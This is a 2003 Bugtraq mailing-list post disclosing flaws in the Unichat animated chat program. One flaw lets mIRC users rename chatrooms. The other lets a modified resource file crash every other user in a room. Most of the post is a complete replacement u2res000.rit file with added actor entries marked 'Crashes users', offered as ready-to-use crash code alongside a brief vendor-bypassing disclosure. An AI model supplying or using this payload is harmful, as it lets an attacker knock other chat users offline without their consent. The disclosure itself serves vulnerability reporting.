[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20031102055811.5290.qmail@sf-www1-symnsj.securityfocus.com>
Date: 2 Nov 2003 05:58:11 -0000
From: DarkKnight <mbuzz04@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Unichat Vulnerabilities
Author: DarkKnight
My site: http://www.insecureonline.com
Product: Unichat
Vendor Info.: Did not respond
//Quote// "Come here," said the Spider to the Fly.
Respected (Just a few):
-------------------
http://securityfocus.com
http://eeye.com
http://packetstormsecurity.nl
http://jinxhackwear.com
http://mod-x.com
-------------------
A program called Unichat suffers from many problems. Firstly, let me explain what Unichat basically is. Unichat is an animated chatting program that has many IRC characteristics.
Unichat's main problem is its inabilitiy to handle characters (not letters) correctly. If an attacker was to add additional characters to the application, which can be done through modifying u2res000.rit, all the user's applications in whichever chatroom the attacker visits, would crash.
Fix for Above: Add more characters to your u2res000.rit to prevent crashing...the more you add, the slower your Unichat may be (especially on the character select screen, which is why you should modify the registry to select the characters).
Remember how I said that Unichat has many IRC characteristics? Well, if someone were to sign on the Unichat server with mIRC, they would be able to change the topic, or in this case, the room name of any room desired, the exception being rooms with weird alt characters in it. Why is this? All Unichat rooms automatically do not have "Only ops set Topic" set. (Note: To get a list of rooms, use the command "/names", it wont show up in "/list". Each room is prefixed with "%#" instead of "#".)
Many more vulnerabilities exist, but the ones I listed are the main ones. I'm not sure if you would call being able to change room names a vulnerability because of how you go about doing it, but I listed it anyways.
##########################################
##### Sample Character Drop Code #####
##### Open u2res000.rit with notepad #####
##### Replace code with below #####
##### - DarkKnight #####
##########################################
// Author: DarkKnight
// WebSite: http://www.insecureonline.com
// Comments: This vulnerability is old, many now know of it.
// Vendor: http://www.unichat.com
; "u2res000.rit"
#VERSION=1.00;
#TIL= // TILE
#
#
{
t00|tcity001=(1,7);
t00|tcity002=(1,5);
t00|tcosm001=(3,7);
t00|tgras001=(1,11);
t00|tgras002=(1,5);
t00|tgras003=(1,2);
t00|tgras004=(1,7);
t00|tgras005=(1,6);
t00|tgras006=(2,7);
t00|tmoun001=(2,10);
t00|tmoun002=(1,13):
t00|troom001=(1,12);
t00|troom002=(1,12);
t00|troom003=(1,11);
t00|troom004=(1,6);
t00|troom005=(1,8);
t00|troom006=(1,11);
t00|troom007=(1,9);
t00|twint001=(1,1);
}
#STT=
{
ca00|cadve001=(10,78);
ca00|cadve006=(23,115);
ca00|cbill001=(32,98);
ca00|ccast002=(106,114);
ca00|ccasw001=(22,30);
ca00|ccasw002=(24,31);
ca00|ccasw003=(8,40);
ca00|ccasw004=(8,40);
ca00|ccasw005=(22,30);
ca00|ccasw006=(24,31);
ca00|ccasw007=(8,40);
ca00|ccasw008=(7,40);
ca00|cceme102=(35,58);
ca00|cceme103=(11,66);
ca00|cceme105=(15,75);
ca00|cceme107=(30,80);
ca00|cceme108=(15,75);
ca00|cceme110=(35,58);
ca00|cceme601=(8,28);
ca00|cceme603=(8,19);
ca00|cceme604=(19,23);
ca00|cceme606=(12,16);
ca00|cceme608=(11,15);
ca00|cceme610=(12,14);
ca00|cceme612=(9,27);
ca00|cceme614=(20,21);
ca00|cceme615=(8,20);
ca00|cceme702=(14,17);
ca00|cceme705=(10,32);
ca00|cceme706=(23,23);
ca00|cceme707=(8,23);
ca00|cceme708=(8,22);
ca00|cceme710=(14,17);
ca00|cceme712=(10,32);
ca00|cceme714=(25,25);
ca00|cceme715=(8,22);
ca00|cceme716=(9,22);
ca00|cchan001=(23,76);
ca00|cchan002=(44,14);
ca00|ccrem001=(125,112);
cd00|cdwwa001=(18,59);
cd00|cdwwa002=(31,99);
cd00|cdwwa003=(29,99);
cd00|cdwwa004=(31,99);
cd00|cdwwa005=(31,99);
cd00|cdwwa006=(31,99);
cd00|cdwwa007=(31,99);
cd00|cdwwa008=(31,99);
cd00|cdwwa009=(31,99);
cd00|ceast001=(8,44);
cd00|ceast002=(15,49);
cd00|ceast003=(8,46);
cd00|ceast004=(9,47);
cd00|ceast006=(11,51);
cd00|ceast007=(10,43);
cd00|ceast009=(15,38);
cd00|ceast011=(8,47);
cd00|ceast015=(30,89);
cd00|ceast017=(12,63);
cd00|ceast018=(12,56);
cd00|ceast020=(15,83);
cd00|ceast024=(15,83);
cd00|cfurn001=(48,51);
cd00|cfurn004=(28,70);
cd00|cfurn005=(7,26);
cd00|cfurn006=(10,24);
cd00|cfurn007=(10,24);
cd00|cfurn008=(10,24);
cd00|cfurn012=(32,34);
cd00|cfurn013=(32,34);
cd00|cfurn014=(32,34);
cd00|cfurn015=(28,36);
cd00|cfurn016=(28,36);
cd00|cfurn017=(28,36);
cd00|cfurn018=(13,28);
cd00|cfurn019=(13,28);
cd00|cfurn020=(13,28);
cd00|cfurn021=(13,33);
cd00|cfurn022=(13,33);
cd00|cfurn023=(13,33);
cd00|cfurn024=(13,25);
cd00|cfurn025=(13,25);
cd00|cfurn026=(13,25);
cd00|cfurn027=(31,33);
cd00|cfurn028=(41,39);
cd00|cfurn029=(34,56);
cd00|cfurn030=(16,76);
cd00|cfurn031=(16,76);
cd00|cfurn032=(14,76);
cd00|cfurn033=(14,76);
cd00|cfurn036=(14,75);
cd00|cfurn038=(50,64);
cd00|cfurn039=(37,33);
cd00|cfurn040=(37,33);
cd00|cfurn041=(37,33);
cd00|cfurn042=(20,20);
cd00|cfurn043=(20,20);
cd00|cfurn044=(20,20);
cd00|cfurn045=(16,25);
cd00|cfurn046=(22,31);
cd00|cfurn047=(22,31);
cd00|cfurn048=(22,31);
cd00|cfurn049=(28,58);
cd00|cfurn050=(35,37);
cd00|cfurn051=(21,49);
cd00|cfurn052=(10,36);
cd00|cfurn053=(33,67);
cd00|cfurn054=(10,40);
cd00|cfurn055=(10,40);
cd00|cfurn056=(10,40);
cd00|cfurn057=(10,40);
cd00|cfurn058=(10,40);
cg00|cgras001=(15,17);
cg00|cgras002=(20,19);
cg00|cgras007=(16,26);
cg00|cgras008=(16,23);
cg00|chous002=(60,70);
cg00|chous003=(68,73);
cg00|chous005=(60,70);
cg00|chous006=(68,73);
cg00|chous008=(60,70);
cg00|chous009=(68,73);
cg00|chous010=(62,47);
cg00|chous011=(63,50);
cg00|chous013=(62,47);
cg00|chous014=(63,50);
cg00|chous016=(62,47);
cg00|chous017=(63,50);
cg00|chous020=(61,67);
cg00|chous021=(55,71);
cg00|cnnwa001=(25,103);
cg00|cnnwa002=(13,100);
cg00|cnnwa003=(32,107);
cg00|cnnwa004=(10,96);
cg00|cnnwa005=(30,106);
cg00|cnnwa006=(29,105);
cg00|cnnwa007=(33,105);
cg00|cnnwa008=(12,97);
cg00|cnnwa009=(27,105);
cg00|cnnwa010=(28,106);
cg00|cnnwa011=(28,110);
cg00|cnnwa012=(24,103);
cg00|cnnwa013=(26,112);
cg00|cnnwa014=(12,99);
cg00|cnnwa015=(25,105);
cg00|cnnwa016=(26,104);
cg00|cpark001=(37,53);
cg00|cpark002=(29,19);
cg00|cpark003=(33,22);
cg00|cpark004=(14,29);
cg00|cpark005=(14,30);
cg00|cpark006=(6,25);
cg00|cpark007=(19,24);
cg00|cpark008=(24,20);
cg00|cpark009=(29,42);
cg00|cpark010=(23,42);
cg00|cpark011=(7,15);
cg00|cpark012=(10,20);
cg00|cpark013=(7,70);
cg00|cpark014=(50,63);
cg00|cpark015=(35,78);
cs00|cshad001=(24,0);
cs00|cshad002=(32,0);
cs00|cshad003=(26,0);
cs00|cshad004=(7,0);
cs00|cshad005=(12,0);
cs00|csign001=(7,81);
cs00|csign002=(7,75);
cs00|csign003=(40,84);
cs00|csign004=(41,77);
cs00|cston001=(17,67);
cs00|cston002=(10,50);
cs00|cston003=(6,31);
cs00|cston004=(15,15);
cs00|cston005=(10,10);
cs00|cston006=(14,56);
cs00|cston007=(6,7);
cs00|cston008=(27,51);
cs00|cston009=(37,48);
cs00|cston010=(12,10);
cs00|cston011=(19,12);
cs00|cston012=(8,52);
cs00|cston013=(20,10);
cs00|cston014=(7,36);
cs00|cston015=(10,49);
cs00|cston016=(24,68);
cs00|cston017=(27,64);
cs00|cston018=(31,59);
cs00|cston019=(27,61);
cs00|cston020=(5,6);
cs00|ctran001=(7,50);
cs00|ctran002=(7,52);
cs00|ctran003=(7,52);
cs00|ctran004=(7,48);
cs00|ctran005=(7,50);
cs00|ctran006=(9,50);
cs00|ctran008=(9,49);
cs00|ctran009=(8,47);
cs00|ctran010=(10,48);
cs00|ctran011=(29,24);
cs00|ctran012=(24,21);
cs00|ctran013=(23,19);
cs00|ctran014=(27,24);
cs00|ctran015=(28,24);
cs00|ctran016=(24,21);
cs00|ctran017=(24,21);
cs00|ctran018=(27,25);
cs00|ctran019=(33,26);
cs00|ctran020=(24,25);
cs00|ctran021=(23,26);
cs00|ctran022=(32,28);
cs00|ctran023=(33,27);
cs00|ctran024=(27,25);
cs00|ctran025=(27,25);
cs00|ctran026=(33,27);
cs00|ctree001=(10,10);
cs00|ctree002=(10,11);
cs00|ctree003=(10,10);
cs00|ctree004=(9,11);
cs00|ctree005=(12,17);
cs00|ctree006=(15,21);
cs00|ctree007=(20,28);
cs00|ctree008=(22,64);
cs00|ctree009=(29,83);
cs00|ctree011=(14,46);
cs00|ctree012=(18,58);
cs00|ctree013=(21,66);
cs00|ctree014=(28,87);
cs00|ctree016=(12,37);
cs00|ctree017=(16,48);
cs00|ctree019=(23,69);
cs00|ctree020=(5,21);
cs00|ctree021=(9,33);
cs00|ctree022=(12,50);
cs00|ctree023=(13,58);
cs00|ctree024=(24,65);
cs00|ctree026=(22,68);
cs00|ctree028=(33,87);
cs00|ctree029=(25,70);
cs00|ctree031=(33,87);
cs00|ctree032=(28,71);
cs00|ctree033=(10,11);
cw00|cwall001=(34,99);
cw00|cwall002=(34,99);
cw00|cwall003=(29,100);
cw00|cwall004=(30,98);
cw00|cwall005=(30,98);
cw00|cwall006=(30,98);
cw00|cwall007=(30,98);
cw00|cwall008=(21,95);
cw00|cwall009=(17,58);
cw00|cwall010=(33,91);
cw00|cwall011=(27,58);
cw00|cwall012=(13,66);
cw00|cwall013=(34,91);
cw00|cwall014=(30,60);
cw00|cwall015=(13,66);
cw00|cwall016=(32,91);
cw00|cwall017=(28,58);
cw00|cwall018=(13,66);
cw00|cwall019=(37,90);
cw00|cwall020=(37,62);
cw00|cwall021=(36,90);
cw00|cwall022=(34,59);
cw00|cwall023=(36,91);
cw00|cwall024=(37,59);
cw00|cwall025=(26,121);
cw00|cwall026=(26,121);
cw00|cwall027=(26,121);
cw00|cwall028=(26,121);
cw00|cwall029=(26,121);
cw00|cwall030=(26,121);
cw00|cwall031=(10,115);
cw00|cwall032=(10,115);
cw00|cwint001=(14,66);
cw00|cwint002=(14,18);
cw00|cwint003=(20,18);
cw00|cwint004=(15,39);
cw00|cwint005=(9,13);
cw00|cwint006=(18,23);
cw00|cwint007=(4,3);
cw00|cwint008=(5,5);
cw00|cwint009=(15,39);
cw00|cwint010=(15,60);
cw00|cwint011=(15,60);
cw00|cwint012=(5,8);
cw00|cwint013=(5,7);
cw00|cwint014=(28,0);
cw00|cwint015=(5,3);
cw00|cwash001=(38,27);
cw00|cwash002=(72,32);
cw00|cwash003=(30,0);
cw00|cwash004=(44,48);
}
#ANI=
{
cw00|iadve001=(3,1),(110,0);
ad_tile_02=(1,4),(1,46);
cw00|iadve003=(1,4),(64,32);
cw00|iarro001=(5,1),(5,0);
cw00|ieast001=(7,1),(12,45);
cw00|ifann001=(3,1),(26,92);
cw00|ifann002=(3,1),(36,15);
cw00|ifire001=(3,1),(10,37);
cw00|ifire003=(3,1),(10,30);
cw00|igras001=(2,1),(7,7);
cw00|ircha001=(3,1),(20,36);
cw00|ircha002=(3,1),(20,23);
cw00|ircha005=(3,1),(20,36);
cw00|ircha006=(3,1),(20,23);
cw00|iston001=(3,1),(27,64);
cw00|itile001=(1,4),(32,0);
cw00|itona001=(3,1),(12,32);
cw00|iwate002=(2,1),(16,8);
cw00|iwate003=(2,1),(32,16);
cw00|wroom001=(1,17),(34,8);
cw01|iadve004=(2,1),(1,46);
}
{
a00|aman_001=(11,4),(23,45);
a00|aman_002=(11,4),(23,45);
a00|aman_003=(11,4),(23,45);
a00|aman_004=(11,4),(23,45);
a00|aman_005=(11,4),(23,45);
a00|aman_006=(11,4),(23,45);
a00|aman_007=(11,4),(23,45);
a00|aman_008=(11,4),(23,45);
a00|aman_009=(11,4),(23,45);
a00|aman_010=(11,4),(23,45);
a00|awman001=(11,4),(23,45);
a00|awman002=(11,4),(23,45);
a00|awman003=(11,4),(23,45);
a00|awman004=(11,4),(23,45);
a00|awman005=(11,4),(23,45);
a00|awman006=(11,4),(23,45);
a00|awman007=(11,4),(23,45);
a00|awman008=(11,4),(23,45);
cs00|ctree019=(11,4),(23,45);
}
#WAV=
{
sagry000;
schng000;
schng001;
schng002;
sclos000;
scrys000;
sembr000;
sembr001;
shit_000;
shit_001;
shit_002;
shit_003;
sjpdn000;
sjpdn001;
sjpup000;
sjpup001;
skiss000;
spick000;
ssexy000;
sstep000;
ssurp000;
stemp000;
stemp001;
stemp002;
stemp003;
stran000;
sturn000;
sturn001;
}
#MID=
{
mjazz000; 0
mjazz001; 1
mjazz002; 2
mjazz003; 3
mjazz004; 4
mjazz005; 5
mjazz006; 6
mcvtn000; 7
mdrmo000; 8
mfanf000; 9
mintr000; 10
mintr001; 11
mjopl000; 12
mmidi000; 13
mmidi001; 14
mmore000; 15
mmzrt000; 16
mrach000; 17
msadd000; 18
mstrs000; 19
msusp000; 20
mumch000; 21
mxmas000; 22
}
#STAGE=
{
0000csin;
0001ctrm;
blackroom;
0002ctrm;
0003ctrm;
0004ctrm;
0005ctrm;
preview;
0000casa;
0000casb;
0000cemt;
0000east;
0000haus;
0000park;
0000spac;
0000ston;
0000strt;
0000wash;
0000wint;
0001demo;
0002demo;
0003demo;
0010casa;
0010casb;
0010csin;
0010cemt;
0020casa;
0020casb;
0020cemt;
0020csin;
0020haus;
0020park;
0030casa;
0030casb;
0040casa;
1010csin;
1020csin;
2000csin;
2010csin;
2100csin;
2110csin;
2200csin;
2220csin;
3100csin;
3110csin;
3200csin;
3220csin;
4000csin;
4010csin;
}
#SERVERIP=
{
65.104.9.68;
65.104.9.68;
127.0.0.1;
}
#ACTOR=a00|aman_001,Toto,40;
{
STANDF=1,(0,2,20,10);
STANDB=1,(9,2,20,10);
STANDINGF=1,(|0,2,20,10,schng002)(/0,2)(*0,2)(#0,2)(0,2);
STANDINGB=1,(|9,2,20,10,schng002)(/9,2)(*9,2)(#9,2)(9,2);
MORPHF=1,(39,2,20,10);
MORPHB=1,(42,2,20,10);
MORPHINGF=1,(|39,2,20,10,schng000)(/39,2)(*39,2)(#39,2)(39,2);
MORPHINGB=1,(|42,2,20,10,schng001)(/42,2)(*42,2)(#42,2)(42,2);
DOZEF=0,(*21,10)(*22,10);
DOZEB=0,(*33,10)(*34,10);
WALKF=1,(1,0,8,4,sstep000)
WALKB=1,(5,0,8,4,sstep000)
UPF=1,(1,0)
UPB=1,(5,0)
DOWNF=1,(1,0)
DOWNB=1,(5,0)
MORPHWALKF=1,(40,0,8,4,sturn000)
MORPHWALKB=1,(42,0,8,4,sturn001)
CHAT=3,(10)(11)(12);
ENTER=1,(|0,3,0,0,sstep000)(/0,3)(*0,3)(#0,3)(0,1);
EXIT=1,(0,3,0,0,sstep000)(#0,3)(*0,3)(/0,3)(|0,3);
SMILE=1,(13,5,0,0,stemp000)(14)(13)(14)(13)(14);
MAD=1,(15,5,0,0,sagry000)(16)(15)(16)(15)(16);
HELLO=1,(17,10)(18);
CRY=1,(19,5,0,0,scrys000)(20)(19)(20)(19)(20);
SCRATCH=1,(23,3,0,0,stemp001)(24,2)(23,3)(24,2);
PICK=1,(29,10,0,0,spick000);
SPECIAL=1,(30,5,0,0,stemp000)(31)(32)(*32)(32)(31)(32);
WIGGLEB=2,(33)(34);
PUNCHF=3,(25,5,0,0,shit_000)(26);
PUNCHB=3,(37,5,0,0,shit_002)(38);
BEATENF=3,(25,5,0,0,shit_000)(26);;
BEATENB=3,(37,5,0,0,shit_002)(38);
}
#ACTOR=a00|aman_002, BatBoi,40;
{
MORPHWALKF=1,(1,0,8,4,sturn000)
MORPHWALKB=1,(5,0,8,4,sturn001)
SPECIAL=1,(30,5,0,0,stemp000)(31)(32)(31)(32);
}
#ACTOR=a00|aman_003, Gull,40;{}
#ACTOR=a00|aman_004, Dino,40;{}
#ACTOR=a00|aman_005, Bongun,40;{}
#ACTOR=a00|aman_006, DarkKnight,40;{}
#ACTOR=a00|aman_007, Board,40;{}
#ACTOR=a00|aman_008, Richard,40;{}
#ACTOR=a00|aman_009, Hook,40;{}
#ACTOR=a00|aman_010, Dalgong,40;{}
#ACTOR=a00|awman001, Cutie,40;{}
#ACTOR=a00|awman002, Dollie,40;{}
#ACTOR=a00|awman003, Foxie,40;{}
#ACTOR=a00|awman004, Sian,40;{}
#ACTOR=a00|awman005, Sharon,40;{}
#ACTOR=a00|awman006, Mingming,40;{}
#ACTOR=a00|awman007, Robo,40;{}
#ACTOR=a00|awman008, Uni,40;{}
#ACTOR=a00|awman008, DarkKnight,40;{} //Crashes users
#ACTOR=a00|awman008, DarkKnight2,40;{} //Crashes users
Powered by blists - more mailing lists